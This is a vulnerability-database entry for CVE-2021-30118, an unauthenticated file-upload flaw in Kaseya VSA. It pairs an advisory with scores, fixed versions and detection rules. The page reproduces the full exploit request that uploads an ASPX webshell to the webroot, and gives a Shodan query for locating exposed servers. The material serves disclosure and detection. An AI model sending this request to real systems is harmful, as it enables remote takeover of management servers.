cbcvebase.
CVE-2021-30118
published 2021-07-09

CVE-2021-30118: An attacker can upload files with the privilege of the Web Server process for Kaseya VSA Unified Remote Monitoring & Management (RMM) 9.5.4.2149 and…

PriorityP191critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
60.08%
99.0th percentile
An attacker can upload files with the privilege of the Web Server process for Kaseya VSA Unified Remote Monitoring & Management (RMM) 9.5.4.2149 and subsequently use these files to execute asp commands The api /SystemTab/uploader.aspx is vulnerable to an unauthenticated arbitrary file upload leading to RCE. An attacker can upload files with the privilege of the Web Server process and subsequently use these files to execute asp commands. Detailed description --- Given the following request: ``` POST /SystemTab/uploader.aspx?Filename=shellz.aspx&PathData=C%3A%5CKaseya%5CWebPages%5C&__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219&qqfile=shellz.aspx HTTP/1.1 Host: 192.168.1.194 Cookie: sessionId=92812726; %5F%5FRequestValidationToken=ac1906a5%2Dd511%2D47e3%2D8500%2D47cc4b0ec219 Content-Length: 12 private const string password = "pass"; // The password ( pass ) private const string style = "dark"; // The style ( light / dark ) protected void Page_Load(object sender, EventArgs e) { //this.Remote(password); this.Login(password); this.Style(); this.ServerInfo(); ``` The attacker can control the name of the file written via the qqfile parameter and the location of the file written via the PathData parameter. Even though the call requires that a sessionId cookie is passed we have determined that the sessionId is not actually validated and any numeric value is accepted as valid. Security issues discovered --- * a sessionId cookie is required by /SystemTab/uploader.aspx, but is not actually validated, allowing an attacker to bypass authentication * /SystemTab/uploader.aspx allows an attacker to create a file with arbitrary content in any place the webserver has write access * The web server process has write access to the webroot where the attacker can execute it by requesting the URL of the newly created file. Impact --- This arbitrary file upload allows an attacker to place files of his own choosing on any location on the hard drive of the server the webserver p

Affected

2 ranges
VendorProductVersion rangeFixed in
kaseyavsa< 9.5.59.5.5
kaseyavsa< 9.5.69.5.6

Detection & IOCsextracted from sources · hover to see the quote

path/SystemTab/uploader.aspx
url/SystemTab/uploader.aspx?Filename=shellz.aspx&PathData=C%3A%5CKaseya%5CWebPages%5C&__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219&qqfile=shellz.aspx
pathC:\Kaseya\WebPages\
othershodan:http.favicon.hash:-1445519482
  • The sessionId cookie is not validated by /SystemTab/uploader.aspx — any numeric value is accepted. Detect exploit attempts by monitoring POST requests to /SystemTab/uploader.aspx with arbitrary numeric sessionId values and parameters Filename, PathData, and qqfile.
  • Alert on POST requests to /SystemTab/uploader.aspx containing PathData pointing to the webroot (e.g. C:\Kaseya\WebPages\) combined with .aspx filenames in the qqfile or Filename parameters, indicating webshell upload attempts.
  • Monitor for unauthenticated POST requests to /SystemTab/uploader.aspx followed by GET requests to newly created .aspx files in the webroot, indicating upload-then-execute RCE exploitation.
  • A successful upload response contains JSON fields 'success' and 'true' with HTTP 200. Correlate this with subsequent GET requests to the uploaded filename to confirm exploitation.
  • ·The __RequestValidationToken parameter uses a fixed GUID value in the documented exploit. This token is not a true CSRF protection in this context since authentication is bypassed entirely.
  • ·The Nuclei template uses a randomized sessionId (rand_int 11111111–99999999) and random filename, meaning exploit traffic will not have a fixed sessionId or filename — detection rules must match on the endpoint and parameter patterns rather than static values.
  • ·The uploaded webshell self-deletes after execution (File.Delete), which limits forensic artifact recovery from disk after successful exploitation.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.